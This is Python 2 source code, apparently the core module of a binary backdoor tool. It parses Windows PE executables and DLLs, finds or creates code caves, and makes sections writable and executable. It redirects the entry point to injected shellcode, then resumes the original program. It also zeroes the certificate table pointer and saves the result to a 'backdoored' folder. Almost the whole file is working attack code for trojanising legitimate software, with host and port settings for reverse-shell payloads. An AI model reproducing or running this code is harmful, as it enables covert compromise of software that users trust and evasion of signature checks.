'0x200': 'Intel Itanium',
'0x9041': 'M32R',
'0x266': 'MIPS16',
'0x366': 'MIPS w/FPU',
'0x466': 'MIPS16 w/FPU',
'0x1f0': 'PowerPC LE',
'0x1f1': 'PowerPC w/FP',
'0x166': 'MIPS LE',
'0x1a2': 'Hitachi SH3',
'0x1a3': 'Hitachi SH3 DSP',
'0x1a6': 'Hitachi SH4',
'0x1a8': 'Hitachi SH5',
'0x1c2': 'ARM or Thumb -interworking',
'0x169': 'MIPS little-endian WCE v2'
}
#What is supported:
supported_types = ['Intel x86', 'x64']
class pebin():
"""
This is the pe binary class. PE files get fed in, stuff is checked, and patching happens.
"""
def __init__(self, FILE, OUTPUT, SHELL, NSECTION='sdata', DISK_OFFSET=0, ADD_SECTION=False,
CAVE_JUMPING=False, PORT=8888, HOST="127.0.0.1", SUPPLIED_SHELLCODE=None,
INJECTOR=False, CHANGE_ACCESS=True, VERBOSE=False, SUPPORT_CHECK=False,
SHELL_LEN=300, FIND_CAVES=False, SUFFIX=".old", DELETE_ORIGINAL=False, CAVE_MINER=False,
IMAGE_TYPE="ALL", ZERO_CERT=True, CHECK_ADMIN=False, PATCH_DLL=True):
self.FILE = FILE
self.OUTPUT = OUTPUT
self.SHELL = SHELL
self.NSECTION = NSECTION
self.DISK_OFFSET = DISK_OFFSET
self.ADD_SECTION = ADD_SECTION
self.CAVE_JUMPING = CAVE_JUMPING
self.PORT = PORT
self.HOST = HOST
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.INJECTOR = INJECTOR
self.CHANGE_ACCESS = CHANGE_ACCESS
self.VERBOSE = VERBOSE
self.SUPPORT_CHECK = SUPPORT_CHECK
self.SHELL_LEN = SHELL_LEN
self.FIND_CAVES = FIND_CAVES
self.SUFFIX = SUFFIX
self.DELETE_ORIGINAL = DELETE_ORIGINAL
self.CAVE_MINER = CAVE_MINER
self.IMAGE_TYPE = IMAGE_TYPE
self.ZERO_CERT = ZERO_CERT
self.CHECK_ADMIN = CHECK_ADMIN
self.PATCH_DLL = PATCH_DLL
self.flItms = {}
def run_this(self):
if self.INJECTOR is True:
self.injector()
sys.exit()
if self.FIND_CAVES is True:
issupported = self.support_check()
if issupported is False:
print self.FILE, "is not supported."
return False
print ("Looking for caves with a size of %s bytes (measured as an integer" % self.SHELL_LEN)
self.find_all_caves()
return True
if self.SUPPORT_CHECK is True:
if not self.FILE:
print "You must provide a file to see if it is supported (-f)"
return False
try:
is_supported = self.support_check()
except Exception, e:
is_supported = False
print 'Exception:', str(e), '%s' % self.FILE
if is_supported is False:
print "%s is not supported." % self.FILE
return False
else:
print "%s is supported." % self.FILE
return True
self.output_options()
return self.patch_pe()
def gather_file_info_win(self):
"""
Gathers necessary PE header information to backdoor
a file and returns a dict of file information called flItms
"""
#To do:
# verify signed vs unsigned
# map all headers
# map offset once the magic field is determined of 32+/32
self.binary.seek(int('3C', 16))
print "[*] Gathering file info"
self.flItms['filename'] = self.FILE
self.flItms['buffer'] = 0
self.flItms['JMPtoCodeAddress'] = 0
self.flItms['LocOfEntryinCode_Offset'] = self.DISK_OFFSET
#---!!!! This will need to change for x64 !!!!
#not so sure now..
self.flItms['dis_frm_pehdrs_sectble'] = 248
self.flItms['pe_header_location'] = struct.unpack('<i', self.binary.read(4))[0]
# Start of COFF
self.flItms['COFF_Start'] = self.flItms['pe_header_location'] + 4
self.binary.seek(self.flItms['COFF_Start'])
self.flItms['MachineType'] = struct.unpack('<H', self.binary.read(2))[0]
if self.VERBOSE is True:
for mactype, name in MachineTypes.iteritems():
if int(mactype, 16) == self.flItms['MachineType']:
print 'MachineType is:', name
#self.binary.seek(self.flItms['BoundImportLocation'])
#self.flItms['BoundImportLOCinCode'] = struct.unpack('<I', self.binary.read(4))[0]
self.binary.seek(self.flItms['COFF_Start'] + 2, 0)
self.flItms['NumberOfSections'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['TimeDateStamp'] = struct.unpack('<I', self.binary.read(4))[0]
self.binary.seek(self.flItms['COFF_Start'] + 16, 0)
self.flItms['SizeOfOptionalHeader'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['Characteristics'] = struct.unpack('<H', self.binary.read(2))[0]
#End of COFF
self.flItms['OptionalHeader_start'] = self.flItms['COFF_Start'] + 20
#if self.flItms['SizeOfOptionalHeader']:
#Begin Standard Fields section of Optional Header
self.binary.seek(self.flItms['OptionalHeader_start'])
self.flItms['Magic'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MajorLinkerVersion'] = struct.unpack("!B", self.binary.read(1))[0]
self.flItms['MinorLinkerVersion'] = struct.unpack("!B", self.binary.read(1))[0]
self.flItms['SizeOfCode'] = struct.unpack("<I", self.binary.read(4))[0]
self.flItms['SizeOfInitializedData'] = struct.unpack("<I", self.binary.read(4))[0]
self.flItms['SizeOfUninitializedData'] = struct.unpack("<I",
self.binary.read(4))[0]
self.flItms['AddressOfEntryPoint'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['BaseOfCode'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'Magic', self.flItms['Magic']
if self.flItms['Magic'] != int('20B', 16):
#print 'Not 0x20B!'
self.flItms['BaseOfData'] = struct.unpack('<I', self.binary.read(4))[0]
# End Standard Fields section of Optional Header
# Begin Windows-Specific Fields of Optional Header
if self.flItms['Magic'] == int('20B', 16):
#print 'x64!'
self.flItms['ImageBase'] = struct.unpack('<Q', self.binary.read(8))[0]
else:
self.flItms['ImageBase'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'self.flItms[ImageBase]', hex(self.flItms['ImageBase'])
self.flItms['SectionAlignment'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['FileAlignment'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
self.binary.read(2))[0]
self.flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
self.binary.read(2))[0]
self.flItms['MajorImageVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MinorImageVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MajorSubsystemVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MinorSubsystemVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['Win32VersionValue'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfImageLoc'] = self.binary.tell()
self.flItms['SizeOfImage'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfHeaders'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['CheckSum'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['Subsystem'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['DllCharacteristics'] = struct.unpack('<H', self.binary.read(2))[0]
if self.flItms['Magic'] == int('20B', 16):
self.flItms['SizeOfStackReserve'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['SizeOfStackCommit'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['SizeOfHeapReserve'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['SizeOfHeapCommit'] = struct.unpack('<Q', self.binary.read(8))[0]
else:
self.flItms['SizeOfStackReserve'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfStackCommit'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfHeapReserve'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfHeapCommit'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['LoaderFlags'] = struct.unpack('<I', self.binary.read(4))[0] # zero
self.flItms['NumberofRvaAndSizes'] = struct.unpack('<I', self.binary.read(4))[0]
# End Windows-Specific Fields of Optional Header
# Begin Data Directories of Optional Header
self.flItms['ExportTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['ImportTableLOCInPEOptHdrs'] = self.binary.tell()
self.flItms['ImportTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['ResourceTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['ExceptionTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['CertTableLOC'] = self.binary.tell()
self.flItms['CertificateTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['BaseReLocationTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['Debug'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['Architecutre'] = struct.unpack('<Q', self.binary.read(8))[0] # zero
self.flItms['GlobalPrt'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['TLS Table'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['LoadConfigTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['BoundImportLocation'] = self.binary.tell()
#print 'BoundImportLocation', hex(self.flItms['BoundImportLocation'])
self.flItms['BoundImport'] = struct.unpack('<Q', self.binary.read(8))[0]
self.binary.seek(self.flItms['BoundImportLocation'])
self.flItms['BoundImportLOCinCode'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'first IATLOCIN CODE', hex(self.flItms['BoundImportLOCinCode'])
self.flItms['BoundImportSize'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'BoundImportSize', hex(self.flItms['BoundImportSize'])
self.flItms['IAT'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['DelayImportDesc'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['CLRRuntimeHeader'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['Reserved'] = struct.unpack('<Q', self.binary.read(8))[0] # zero
self.flItms['BeginSections'] = self.binary.tell()
if self.flItms['NumberOfSections'] is not 0:
self.flItms['Sections'] = []
for section in range(self.flItms['NumberOfSections']):
sectionValues = []
sectionValues.append(self.binary.read(8))
# VirtualSize
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# VirtualAddress
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# SizeOfRawData
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# PointerToRawData
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# PointerToRelocations
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# PointerToLinenumbers
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# NumberOfRelocations
sectionValues.append(struct.unpack('<H', self.binary.read(2))[0])
# NumberOfLinenumbers
sectionValues.append(struct.unpack('<H', self.binary.read(2))[0])
# SectionFlags
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
self.flItms['Sections'].append(sectionValues)
if 'UPX'.lower() in sectionValues[0].lower():
print "UPX files not supported."
return False
if ('.text\x00\x00\x00' == sectionValues[0] or
'AUTO\x00\x00\x00\x00' == sectionValues[0] or
'CODE\x00\x00\x00\x00' == sectionValues[0]):
self.flItms['textSectionName'] = sectionValues[0]
self.flItms['textVirtualAddress'] = sectionValues[2]
self.flItms['textPointerToRawData'] = sectionValues[4]
elif '.rsrc\x00\x00\x00' == sectionValues[0]:
self.flItms['rsrcSectionName'] = sectionValues[0]
self.flItms['rsrcVirtualAddress'] = sectionValues[2]
self.flItms['rsrcSizeRawData'] = sectionValues[3]
self.flItms['rsrcPointerToRawData'] = sectionValues[4]
self.flItms['VirtualAddress'] = self.flItms['SizeOfImage']
self.flItms['LocOfEntryinCode'] = (self.flItms['AddressOfEntryPoint'] -
self.flItms['textVirtualAddress'] +
self.flItms['textPointerToRawData'] +
self.flItms['LocOfEntryinCode_Offset'])
else:
self.flItms['LocOfEntryinCode'] = (self.flItms['AddressOfEntryPoint'] -
self.flItms['LocOfEntryinCode_Offset'])
self.flItms['VrtStrtngPnt'] = (self.flItms['AddressOfEntryPoint'] +
self.flItms['ImageBase'])
self.binary.seek(self.flItms['BoundImportLOCinCode'])
self.flItms['ImportTableALL'] = self.binary.read(self.flItms['BoundImportSize'])
self.flItms['NewIATLoc'] = self.flItms['BoundImportLOCinCode'] + 40
####################################
#### Parse imports via pefile ######
self.binary.seek(0)
#make this option only if a IAT based shellcode is selected
if 'iat' in self.SHELL:
print "[*] Loading PE in pefile"
pe = pefile.PE(self.FILE, fast_load=True)
#pe = pefile.PE(data=self.binary)
print "[*] Parsing data directories"
pe.parse_data_directories()
try:
for entry in pe.DIRECTORY_ENTRY_IMPORT:
#print entry.dll
for imp in entry.imports:
#print imp.name
#print "\t", imp.name
if imp.name is None:
continue
if imp.name.lower() == 'loadlibrarya':
self.flItms['LoadLibraryAOffset'] = imp.address - pe.OPTIONAL_HEADER.ImageBase
self.flItms['LoadLibraryA'] = imp.address
if imp.name.lower() == 'getprocaddress':
self.flItms['GetProcAddressOffset'] = imp.address - pe.OPTIONAL_HEADER.ImageBase
self.flItms['GetProcAddress'] = imp.address
''' #save for later use
if imp.name.lower() == 'createprocessa':
print imp.name, hex(imp.address)
if imp.name.lower() == 'waitforsingleobject':
print imp.name, hex(imp.address)
if imp.name.lower() == 'virtualalloc':
print imp.name, hex(imp.address)
if imp.name.lower() == 'connect':
print imp.name, hex(imp.address)
if imp.name.lower() == 'createthread':
print imp.name, hex(imp.address)
'''
except Exception as e:
print "Exception:", str(e)
#####################################
def print_flItms(self, flItms):
keys = self.flItms.keys()
keys.sort()
for item in keys:
if type(self.flItms[item]) == int:
print item + ':', hex(self.flItms[item])
elif item == 'Sections':
print "-" * 50
for section in self.flItms['Sections']:
print "Section Name", section[0]
print "Virutal Size", hex(section[1])
print "Virtual Address", hex(section[2])
print "SizeOfRawData", hex(section[3])
print "PointerToRawData", hex(section[4])
print "PointerToRelocations", hex(section[5])
print "PointerToLinenumbers", hex(section[6])
print "NumberOfRelocations", hex(section[7])
print "NumberOfLinenumbers", hex(section[8])
print "SectionFlags", hex(section[9])
print "-" * 50
else:
print item + ':', self.flItms[item]
print "*" * 50, "END flItms"
def change_section_flags(self, section):
"""
Changes the user selected section to RWE for successful execution
"""
print "[*] Changing Section Flags"
self.flItms['newSectionFlags'] = int('e00000e0', 16)
self.binary.seek(self.flItms['BeginSections'], 0)
for _ in range(self.flItms['NumberOfSections']):
sec_name = self.binary.read(8)
if section in sec_name:
self.binary.seek(28, 1)
self.binary.write(struct.pack('<I', self.flItms['newSectionFlags']))
return
else:
self.binary.seek(32, 1)
def create_code_cave(self):
"""
This function creates a code cave for shellcode to hide,
takes in the dict from gather_file_info_win function and
writes to the file and returns flItms
"""
print "[*] Creating Code Cave"
self.flItms['NewSectionSize'] = len(self.flItms['shellcode']) + 250 # bytes
self.flItms['SectionName'] = self.NSECTION # less than 7 chars
self.flItms['filesize'] = os.stat(self.flItms['filename']).st_size
self.flItms['newSectionPointerToRawData'] = self.flItms['filesize']
self.flItms['VirtualSize'] = int(str(self.flItms['NewSectionSize']), 16)
self.flItms['SizeOfRawData'] = self.flItms['VirtualSize']
self.flItms['NewSectionName'] = "." + self.flItms['SectionName']
self.flItms['newSectionFlags'] = int('e00000e0', 16)
self.binary.seek(self.flItms['pe_header_location'] + 6, 0)
self.binary.write(struct.pack('<h', self.flItms['NumberOfSections'] + 1))
self.binary.seek(self.flItms['SizeOfImageLoc'], 0)
self.flItms['NewSizeOfImage'] = (self.flItms['VirtualSize'] +
self.flItms['SizeOfImage'])
self.binary.write(struct.pack('<I', self.flItms['NewSizeOfImage']))
self.binary.seek(self.flItms['BoundImportLocation'])
if self.flItms['BoundImportLOCinCode'] != 0:
self.binary.write(struct.pack('=i', self.flItms['BoundImportLOCinCode'] + 40))
self.binary.seek(self.flItms['BeginSections'] +
40 * self.flItms['NumberOfSections'], 0)
self.binary.write(self.flItms['NewSectionName'] +
"\x00" * (8 - len(self.flItms['NewSectionName'])))
self.binary.write(struct.pack('<I', self.flItms['VirtualSize']))
self.binary.write(struct.pack('<I', self.flItms['SizeOfImage']))
self.binary.write(struct.pack('<I', self.flItms['SizeOfRawData']))
self.binary.write(struct.pack('<I', self.flItms['newSectionPointerToRawData']))
if self.VERBOSE is True:
print 'New Section PointerToRawData'
print self.flItms['newSectionPointerToRawData']
self.binary.write(struct.pack('<I', 0))
self.binary.write(struct.pack('<I', 0))
self.binary.write(struct.pack('<I', 0))
self.binary.write(struct.pack('<I', self.flItms['newSectionFlags']))
self.binary.write(self.flItms['ImportTableALL'])
self.binary.seek(self.flItms['filesize'] + 1, 0) # moving to end of file
nop = choice(intelCore.nops)
if nop > 144:
self.binary.write(struct.pack('!H', nop) * (self.flItms['VirtualSize'] / 2))
else:
self.binary.write(struct.pack('!B', nop) * (self.flItms['VirtualSize']))
self.flItms['CodeCaveVirtualAddress'] = (self.flItms['SizeOfImage'] +
self.flItms['ImageBase'])
self.flItms['buffer'] = int('200', 16) # bytes
self.flItms['JMPtoCodeAddress'] = (self.flItms['CodeCaveVirtualAddress'] -
self.flItms['AddressOfEntryPoint'] -
self.flItms['ImageBase'] - 5 +
self.flItms['buffer'])
def find_all_caves(self):
"""
This function finds all the codecaves in a inputed file.
Prints results to screen
"""
print "[*] Looking for caves"
SIZE_CAVE_TO_FIND = self.SHELL_LEN
BeginCave = 0
Tracking = 0
count = 1
caveTracker = []
caveSpecs = []
self.binary = open(self.FILE, 'r+b')
self.binary.seek(0)
while True:
try:
s = struct.unpack("<b", self.binary.read(1))[0]
except Exception as e:
#print str(e)
break
if s == 0:
if count == 1:
BeginCave = Tracking
count += 1
else:
if count >= SIZE_CAVE_TO_FIND:
caveSpecs.append(BeginCave)
caveSpecs.append(Tracking)
caveTracker.append(caveSpecs)
count = 1
caveSpecs = []
Tracking += 1
for caves in caveTracker:
for section in self.flItms['Sections']:
sectionFound = False
if caves[0] >= section[4] and caves[1] <= (section[3] + section[4]) and \
caves[1] - caves[0] >= SIZE_CAVE_TO_FIND:
print "We have a winner:", section[0]
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print 'SizeOfRawData', hex(section[3])
print 'PointerToRawData', hex(section[4])
print 'End of Raw Data:', hex(section[3] + section[4])
print '*' * 50
sectionFound = True
break
if sectionFound is False:
try:
print "No section"
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print '*' * 50
except Exception as e:
print str(e)
print "[*] Total of %s caves found" % len(caveTracker)
self.binary.close()
def find_cave(self):
"""This function finds all code caves, allowing the user
to pick the cave for injecting shellcode."""
len_allshells = ()
if self.flItms['cave_jumping'] is True:
for item in self.flItms['allshells']:
len_allshells += (len(item), )
len_allshells += (len(self.flItms['resumeExe']), )
SIZE_CAVE_TO_FIND = sorted(len_allshells)[0]
else:
SIZE_CAVE_TO_FIND = self.flItms['shellcode_length']
len_allshells = (self.flItms['shellcode_length'], )
print "[*] Looking for caves that will fit the minimum "\
"shellcode length of %s" % SIZE_CAVE_TO_FIND
print "[*] All caves lengths: ", len_allshells
Tracking = 0
count = 1
#BeginCave=0
caveTracker = []
caveSpecs = []
self.binary.seek(0)
while True:
try:
s = struct.unpack("<b", self.binary.read(1))[0]
except: # Exception as e:
#print "CODE CAVE", str(e)
break
if s == 0:
if count == 1:
BeginCave = Tracking
count += 1
else:
if count >= SIZE_CAVE_TO_FIND:
caveSpecs.append(BeginCave)
caveSpecs.append(Tracking)
caveTracker.append(caveSpecs)
count = 1
caveSpecs = []
Tracking += 1
pickACave = {}
for i, caves in enumerate(caveTracker):
i += 1
for section in self.flItms['Sections']:
sectionFound = False
try:
if caves[0] >= section[4] and \
caves[1] <= (section[3] + section[4]) and \
caves[1] - caves[0] >= SIZE_CAVE_TO_FIND:
if self.VERBOSE is True:
print "Inserting code in this section:", section[0]
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print 'SizeOfRawData', hex(section[3])
print 'PointerToRawData', hex(section[4])
print 'End of Raw Data:', hex(section[3] + section[4])
print '*' * 50
JMPtoCodeAddress = (section[2] + caves[0] - section[4] -
5 - self.flItms['AddressOfEntryPoint'])
sectionFound = True
pickACave[i] = [section[0], hex(caves[0]), hex(caves[1]),
caves[1] - caves[0], hex(section[4]),
hex(section[3] + section[4]), JMPtoCodeAddress]
break
except:
print "-End of File Found.."
break
if sectionFound is False:
if self.VERBOSE is True:
print "No section"
print '->Begin Cave', hex(caves[0])
print '->End of Cave', hex(caves[1])
print 'Size of Cave (int)', caves[1] - caves[0]
print '*' * 50
JMPtoCodeAddress = (section[2] + caves[0] - section[4] -
5 - self.flItms['AddressOfEntryPoint'])
try:
pickACave[i] = [None, hex(caves[0]), hex(caves[1]),
caves[1] - caves[0], None,
None, JMPtoCodeAddress]
except:
print "EOF"
print ("############################################################\n"
"The following caves can be used to inject code and possibly\n"
"continue execution.\n"
"**Don't like what you see? Use jump, single, append, or ignore.**\n"
"############################################################")
CavesPicked = {}
for k, item in enumerate(len_allshells):
print "[*] Cave {0} length as int: {1}".format(k + 1, item)
print "[*] Available caves: "
for ref, details in pickACave.iteritems():
if details[3] >= item:
print str(ref) + ".", ("Section Name: {0}; Section Begin: {4} "
"End: {5}; Cave begin: {1} End: {2}; "
"Cave Size: {3}".format(details[0], details[1], details[2],
details[3], details[4], details[5],
details[6]))
while True:
try:
self.CAVE_MINER_TRACKER
except:
self.CAVE_MINER_TRACKER = 0
print "*" * 50
selection = raw_input("[!] Enter your selection: ")
try:
selection = int(selection)
print "[!] Using selection: %s" % selection
try:
if self.CHANGE_ACCESS is True:
if pickACave[selection][0] is not None:
self.change_section_flags(pickACave[selection][0])
CavesPicked[k] = pickACave[selection]
break
except:
print "[!!!!] User selection beyond the bounds of available caves."
print "[!!!!] Try a number or the following commands:"
print "[!!!!] append or a, jump or j, ignore or i, single or s"
print "[!!!!] TRY AGAIN."
continue
except:
pass
breakOutValues = ['append', 'jump', 'single', 'ignore', 'a', 'j', 's', 'i']
if selection.lower() in breakOutValues:
return selection
return CavesPicked
def runas_admin(self):
"""
This module jumps to .rsrc section and checks for
the following string: requestedExecutionLevel level="highestAvailable"
"""
#g = open(flItms['filename'], "rb")
runas_admin = False
print "[*] Checking Runas_admin"
if 'rsrcPointerToRawData' in self.flItms:
self.binary.seek(self.flItms['rsrcPointerToRawData'], 0)
search_lngth = len('requestedExecutionLevel level="highestAvailable"')
data_read = 0
while data_read < self.flItms['rsrcSizeRawData']:
self.binary.seek(self.flItms['rsrcPointerToRawData'] + data_read, 0)
temp_data = self.binary.read(search_lngth)
if temp_data == 'requestedExecutionLevel level="highestAvailable"':
runas_admin = True
break
data_read += 1
if runas_admin is True:
print "[*] %s must run with highest available privileges" % self.FILE
else:
print "[*] %s does not require highest available privileges" % self.FILE
return runas_admin
def support_check(self):
"""
This function is for checking if the current exe/dll is
supported by this program. Returns false if not supported,
returns flItms if it is.
"""
print "[*] Checking if binary is supported"
self.flItms['supported'] = False
#convert to with open FIX
self.binary = open(self.FILE, "r+b")
if self.binary.read(2) != "\x4d\x5a":
print "%s not a PE File" % self.FILE
return False
self.gather_file_info_win()
if self.flItms is False:
return False
if MachineTypes[hex(self.flItms['MachineType'])] not in supported_types:
for item in self.flItms:
print item + ':', self.flItms[item]
print ("This program does not support this format: %s"
% MachineTypes[hex(self.flItms['MachineType'])])
else:
self.flItms['supported'] = True
targetFile = intelCore(self.flItms, self.binary, self.VERBOSE)
if self.flItms['Characteristics'] - 0x2000 > 0 and self.PATCH_DLL is False:
return False
if self.flItms['Magic'] == int('20B', 16) and (self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x64'):
#if self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x64':
targetFile.pe64_entry_instr()
elif self.flItms['Magic'] == int('10b', 16) and (self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x86'):
#if self.IMAGE_TYPE == 'ALL' or self.IMAGE_TYPE == 'x32':
targetFile.pe32_entry_instr()
else:
self.flItms['supported'] = False
if self.CHECK_ADMIN is True:
self.flItms['runas_admin'] = self.runas_admin()
if self.VERBOSE is True:
self.print_flItms(self.flItms)
if self.flItms['supported'] is False:
return False
self.binary.close()
def patch_pe(self):
"""
This function operates the sequence of all involved
functions to perform the binary patching.
"""
print "[*] In the backdoor module"
if self.INJECTOR is False:
os_name = os.name
if not os.path.exists("backdoored"):
os.makedirs("backdoored")
if os_name == 'nt':
self.OUTPUT = "backdoored\\" + self.OUTPUT
else:
self.OUTPUT = "backdoored/" + self.OUTPUT
issupported = self.support_check()
if issupported is False:
return None
self.flItms['NewCodeCave'] = self.ADD_SECTION
self.flItms['cave_jumping'] = self.CAVE_JUMPING
self.flItms['CavesPicked'] = {}
self.flItms['LastCaveAddress'] = 0
self.flItms['stager'] = False
self.flItms['supplied_shellcode'] = self.SUPPLIED_SHELLCODE
theResult = self.set_shells()
if theResult is False or self.flItms['allshells'] is False:
return False
#Creating file to backdoor
self.flItms['backdoorfile'] = self.OUTPUT
shutil.copy2(self.FILE, self.flItms['backdoorfile'])
self.binary = open(self.flItms['backdoorfile'], "r+b")
#reserve space for shellcode
targetFile = intelCore(self.flItms, self.binary, self.VERBOSE)
# Finding the length of the resume Exe shellcode
if self.flItms['Magic'] == int('20B', 16):
_, self.flItms['resumeExe'] = targetFile.resume_execution_64()
else:
_, self.flItms['resumeExe'] = targetFile.resume_execution_32()
shellcode_length = len(self.flItms['shellcode'])
self.flItms['shellcode_length'] = shellcode_length + len(self.flItms['resumeExe'])
caves_set = False
while caves_set is False and self.flItms['NewCodeCave'] is False:
#if self.flItms['NewCodeCave'] is False:
#self.flItms['JMPtoCodeAddress'], self.flItms['CodeCaveLOC'] = (
self.flItms['CavesPicked'] = self.find_cave()
if type(self.flItms['CavesPicked']) == str:
if self.flItms['CavesPicked'].lower() in ['append', 'a']:
self.flItms['JMPtoCodeAddress'] = None
self.flItms['CodeCaveLOC'] = 0
self.flItms['cave_jumping'] = False
self.flItms['CavesPicked'] = {}
print "-resetting shells"
self.set_shells()
caves_set = True
elif self.flItms['CavesPicked'].lower() in ['jump', 'j']:
self.flItms['JMPtoCodeAddress'] = None
self.flItms['CodeCaveLOC'] = 0
self.flItms['cave_jumping'] = True
self.flItms['CavesPicked'] = {}
print "-resetting shells"
self.set_shells()
continue
elif self.flItms['CavesPicked'].lower() in ['single', 's']:
self.flItms['JMPtoCodeAddress'] = None
self.flItms['CodeCaveLOC'] = 0
self.flItms['cave_jumping'] = False
self.flItms['CavesPicked'] = {}
print "-resetting shells"
self.set_shells()
continue
elif self.flItms['CavesPicked'].lower() in ['ignore', 'i']:
#Let's say we don't want to patch a binary
return None
elif self.flItms['CavesPicked'] is None:
return None
else:
self.flItms['JMPtoCodeAddress'] = self.flItms['CavesPicked'].iteritems().next()[1][6]
caves_set = True
#else:
# caves_set = True
#If no cave found, continue to create one.
if self.flItms['JMPtoCodeAddress'] is None or self.flItms['NewCodeCave'] is True:
self.create_code_cave()
self.flItms['NewCodeCave'] = True
print "- Adding a new section to the exe/dll for shellcode injection"
else:
self.flItms['LastCaveAddress'] = self.flItms['CavesPicked'][len(self.flItms['CavesPicked']) - 1][6]
#Patch the entry point
targetFile = intelCore(self.flItms, self.binary, self.VERBOSE)
targetFile.patch_initial_instructions()
if self.flItms['Magic'] == int('20B', 16):
ReturnTrackingAddress, self.flItms['resumeExe'] = targetFile.resume_execution_64()
else:
ReturnTrackingAddress, self.flItms['resumeExe'] = targetFile.resume_execution_32()
self.set_shells()
if self.flItms['cave_jumping'] is True:
if self.flItms['stager'] is False:
temp_jmp = "\xe9"
breakupvar = eat_code_caves(self.flItms, 1, 2)
test_length = int(self.flItms['CavesPicked'][2][1], 16) - int(self.flItms['CavesPicked'][1][1], 16) - len(self.flItms['allshells'][1]) - 5
if test_length < 0:
temp_jmp += struct.pack("<I", 0xffffffff - abs(breakupvar - len(self.flItms['allshells'][1]) - 4))
else:
temp_jmp += struct.pack("<I", breakupvar - len(self.flItms['allshells'][1]) - 5)
self.flItms['allshells'] += (self.flItms['resumeExe'], )
self.flItms['completeShellcode'] = self.flItms['shellcode'] + self.flItms['resumeExe']
if self.flItms['NewCodeCave'] is True:
self.binary.seek(self.flItms['newSectionPointerToRawData'] + self.flItms['buffer'])
self.binary.write(self.flItms['completeShellcode'])
if self.flItms['cave_jumping'] is True:
for i, item in self.flItms['CavesPicked'].iteritems():
self.binary.seek(int(self.flItms['CavesPicked'][i][1], 16))
self.binary.write(self.flItms['allshells'][i])
#So we can jump to our resumeExe shellcode
if i == (len(self.flItms['CavesPicked']) - 2) and self.flItms['stager'] is False:
self.binary.write(temp_jmp)
else:
for i, item in self.flItms['CavesPicked'].iteritems():
if i == 0:
self.binary.seek(int(self.flItms['CavesPicked'][i][1], 16))
self.binary.write(self.flItms['completeShellcode'])
#Patch certTable
if self.ZERO_CERT is True:
print "[*] Overwriting certificate table pointer"
self.binary.seek(self.flItms['CertTableLOC'], 0)
self.binary.write("\x00\x00\x00\x00\x00\x00\x00\x00")
print "[*] {0} backdooring complete".format(self.FILE)
self.binary.close()
if self.VERBOSE is True:
self.print_flItms(self.flItms)
return True
def output_options(self):
"""
Output file check.
"""
if not self.OUTPUT:
self.OUTPUT = os.path.basename(self.FILE)
def set_shells(self):
"""
This function sets the shellcode.
"""
print "[*] Looking for and setting selected shellcode"
if self.flItms['Magic'] == int('10B', 16):
self.flItms['bintype'] = winI32_shellcode
if self.flItms['Magic'] == int('20B', 16):
self.flItms['bintype'] = winI64_shellcode
if not self.SHELL:
print "You must choose a backdoor to add: (use -s)"
for item in dir(self.flItms['bintype']):
if "__" in item:
continue
elif ("returnshellcode" == item
or "pack_ip_addresses" == item
or "eat_code_caves" == item
or 'ones_compliment' == item
or 'resume_execution' in item
or 'returnshellcode' in item):
continue
else:
print " {0}".format(item)
return False
